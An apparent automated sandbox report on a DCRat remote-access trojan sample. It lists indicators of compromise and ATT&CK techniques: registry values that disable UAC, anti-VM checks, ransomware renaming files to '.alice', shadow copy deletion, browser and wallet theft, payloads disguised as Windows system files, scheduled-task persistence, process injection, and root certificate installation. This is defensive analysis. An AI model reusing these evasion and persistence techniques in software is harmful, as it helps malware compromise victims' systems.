dcrat | bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0

Processes:

ec50388a69792d133c1298e1dceb40a6.exeIdle.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/1972-57-0x0000000000F00000-0x00000000015D6000-memory.dmp	dcrat
behavioral1/memory/1972-361-0x0000000000F00000-0x00000000015D6000-memory.dmp	dcrat
behavioral1/memory/2536-472-0x0000000000020000-0x00000000006F6000-memory.dmp	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

ec50388a69792d133c1298e1dceb40a6.exeIdle.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ec50388a69792d133c1298e1dceb40a6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Idle.exe

Downloads MZ/PE file

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

AppLaunch.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ExitUnregister.tif.alice	AppLaunch.exe
File renamed	C:\Users\Admin\Pictures\MeasureSelect.png => C:\Users\Admin\Pictures\MeasureSelect.png.alice	AppLaunch.exe
File opened for modification	C:\Users\Admin\Pictures\MeasureSelect.png.alice	AppLaunch.exe
File opened for modification	C:\Users\Admin\Pictures\StopPush.png.alice	AppLaunch.exe
File renamed	C:\Users\Admin\Pictures\DebugUnlock.tiff => C:\Users\Admin\Pictures\DebugUnlock.tiff.alice	AppLaunch.exe
File opened for modification	C:\Users\Admin\Pictures\DebugUnlock.tiff.alice	AppLaunch.exe
File renamed	C:\Users\Admin\Pictures\ExitUnregister.tif => C:\Users\Admin\Pictures\ExitUnregister.tif.alice	AppLaunch.exe
File renamed	C:\Users\Admin\Pictures\StopPush.png => C:\Users\Admin\Pictures\StopPush.png.alice	AppLaunch.exe
File opened for modification	C:\Users\Admin\Pictures\DebugUnlock.tiff	AppLaunch.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

ec50388a69792d133c1298e1dceb40a6.exeIdle.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ec50388a69792d133c1298e1dceb40a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Idle.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Idle.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ec50388a69792d133c1298e1dceb40a6.exe

Executes dropped EXE 4 IoCs

Processes:

Idle.exem.exeh.exemm.exe

pid process

2536 Idle.exe
1596 m.exe
2060 h.exe
2908 mm.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.exeIdle.exe

pid process

2212 cmd.exe
2536 Idle.exe
2536 Idle.exe
2536 Idle.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2536	Idle.exe
1596	m.exe
2060	h.exe
2908	mm.exe

pid	process
2212	cmd.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1972-57-0x0000000000F00000-0x00000000015D6000-memory.dmp	themida
C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe	themida
C:\Program Files\Windows Journal\it-IT\RCX302D.tmp	themida
behavioral1/memory/1972-361-0x0000000000F00000-0x00000000015D6000-memory.dmp	themida
\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe	themida
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe	themida
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe	themida
behavioral1/memory/2536-472-0x0000000000020000-0x00000000006F6000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

Processes:

Idle.exeec50388a69792d133c1298e1dceb40a6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Idle.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

AppLaunch.exe

description	ioc	process
File opened (read-only)	\??\O:	AppLaunch.exe
File opened (read-only)	\??\F:	AppLaunch.exe
File opened (read-only)	\??\N:	AppLaunch.exe
File opened (read-only)	\??\T:	AppLaunch.exe
File opened (read-only)	\??\Y:	AppLaunch.exe
File opened (read-only)	\??\P:	AppLaunch.exe
File opened (read-only)	\??\S:	AppLaunch.exe
File opened (read-only)	\??\L:	AppLaunch.exe
File opened (read-only)	\??\B:	AppLaunch.exe
File opened (read-only)	\??\M:	AppLaunch.exe
File opened (read-only)	\??\Q:	AppLaunch.exe
File opened (read-only)	\??\W:	AppLaunch.exe
File opened (read-only)	\??\E:	AppLaunch.exe
File opened (read-only)	\??\J:	AppLaunch.exe
File opened (read-only)	\??\K:	AppLaunch.exe
File opened (read-only)	\??\V:	AppLaunch.exe
File opened (read-only)	\??\Z:	AppLaunch.exe
File opened (read-only)	\??\X:	AppLaunch.exe
File opened (read-only)	\??\R:	AppLaunch.exe
File opened (read-only)	\??\U:	AppLaunch.exe
File opened (read-only)	\??\I:	AppLaunch.exe
File opened (read-only)	\??\A:	AppLaunch.exe
File opened (read-only)	\??\G:	AppLaunch.exe
File opened (read-only)	\??\H:	AppLaunch.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 ipinfo.io
7 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

ec50388a69792d133c1298e1dceb40a6.exeIdle.exe

pid process

1972 ec50388a69792d133c1298e1dceb40a6.exe
2536 Idle.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

h.exem.exe

description pid process target process

PID 2060 set thread context of 1564 2060 h.exe AppLaunch.exe
PID 1596 set thread context of 1732 1596 m.exe vbc.exe

flow	ioc
6	ipinfo.io
7	ipinfo.io

description	pid	process	target process
PID 2060 set thread context of 1564	2060	h.exe	AppLaunch.exe
PID 1596 set thread context of 1732	1596	m.exe	vbc.exe

Drops file in Program Files directory 24 IoCs

Processes:

ec50388a69792d133c1298e1dceb40a6.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Portable Devices\RCX3481.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCX3492.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Portable Devices\lsass.exe	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Internet Explorer\fr-FR\System.exe	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\6203df4a6bafc7	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Journal\it-IT\RCX301C.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX5D39.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX61BD.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files\Windows Sidebar\en-US\27d1bcfc3c54e0	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files\Windows Portable Devices\6203df4a6bafc7	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Sidebar\en-US\System.exe	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Sidebar\en-US\RCX4730.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Internet Explorer\fr-FR\RCX4FF9.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Internet Explorer\fr-FR\RCX500A.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Journal\it-IT\csrss.exe	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files\Windows Journal\it-IT\886983d96e3d3e	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\cc11b995f2a76d	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Journal\it-IT\RCX302D.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files\Windows Sidebar\en-US\RCX471F.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX5D59.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX61CE.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Program Files\Internet Explorer\fr-FR\27d1bcfc3c54e0	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe	ec50388a69792d133c1298e1dceb40a6.exe

Drops file in Windows directory 8 IoCs

Processes:

ec50388a69792d133c1298e1dceb40a6.exe

description	ioc	process
File opened for modification	C:\Windows\Cursors\RCX6632.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Windows\Cursors\RCX6662.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Windows\Fonts\spoolsv.exe	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Windows\Fonts\f3b6ecef712a24	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Windows\Cursors\smss.exe	ec50388a69792d133c1298e1dceb40a6.exe
File created	C:\Windows\Cursors\69ddcba757bf72	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Windows\Fonts\RCX42AB.tmp	ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification	C:\Windows\Fonts\RCX42BB.tmp	ec50388a69792d133c1298e1dceb40a6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 55 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

pid	process
1332	schtasks.exe
1992	schtasks.exe
1092	schtasks.exe
996	schtasks.exe
832	schtasks.exe
2024	schtasks.exe
1376	schtasks.exe
1396	schtasks.exe
2044	schtasks.exe
928	schtasks.exe
2024	schtasks.exe
844	schtasks.exe
1744	schtasks.exe
2020	schtasks.exe
1276	schtasks.exe
316	schtasks.exe
1200	schtasks.exe
1924	schtasks.exe
792	schtasks.exe
392	schtasks.exe
1432	schtasks.exe
840	schtasks.exe
1508	schtasks.exe
1524	schtasks.exe
1996	schtasks.exe
2016	schtasks.exe
580	schtasks.exe
588	schtasks.exe
1184	schtasks.exe
1876	schtasks.exe
516	schtasks.exe
1928	schtasks.exe
1448	schtasks.exe
1660	schtasks.exe
1288	schtasks.exe
392	schtasks.exe
1680	schtasks.exe
588	schtasks.exe
1288	schtasks.exe
748	schtasks.exe
1332	schtasks.exe
1508	schtasks.exe
2016	schtasks.exe
2080	schtasks.exe
608	schtasks.exe
1396	schtasks.exe
2024	schtasks.exe
2028	schtasks.exe
580	schtasks.exe
1684	schtasks.exe
1956	schtasks.exe
984	schtasks.exe
976	schtasks.exe
936	schtasks.exe
920	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

3024 vssadmin.exe
2496 vssadmin.exe

pid	process
3024	vssadmin.exe
2496	vssadmin.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Idle.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Idle.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Idle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Idle.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Idle.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Idle.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Idle.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

Processes:

ec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIdle.exepowershell.exeAppLaunch.exepowershell.exem.exe

pid	process
1972	ec50388a69792d133c1298e1dceb40a6.exe
1972	ec50388a69792d133c1298e1dceb40a6.exe
1972	ec50388a69792d133c1298e1dceb40a6.exe
1972	ec50388a69792d133c1298e1dceb40a6.exe
1972	ec50388a69792d133c1298e1dceb40a6.exe
1972	ec50388a69792d133c1298e1dceb40a6.exe
588	powershell.exe
1908	powershell.exe
1656	powershell.exe
1900	powershell.exe
920	powershell.exe
808	powershell.exe
1184	powershell.exe
692	powershell.exe
1920	powershell.exe
580	powershell.exe
1936	powershell.exe
840	powershell.exe
1288	powershell.exe
428	powershell.exe
1564	powershell.exe
2008	powershell.exe
1660	powershell.exe
1156	powershell.exe
2012	powershell.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
2536	Idle.exe
3008	powershell.exe
1564	AppLaunch.exe
2172	powershell.exe
1596	m.exe
1596	m.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1972	ec50388a69792d133c1298e1dceb40a6.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	692	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2536	Idle.exe
Token: SeBackupPrivilege	2872	vssvc.exe
Token: SeRestorePrivilege	2872	vssvc.exe
Token: SeAuditPrivilege	2872	vssvc.exe
Token: SeDebugPrivilege	1596	m.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeBackupPrivilege	2164	vssvc.exe
Token: SeRestorePrivilege	2164	vssvc.exe
Token: SeAuditPrivilege	2164	vssvc.exe
Token: SeDebugPrivilege	2172	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Idle.exe

pid process

2536 Idle.exe

pid	process
2536	Idle.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

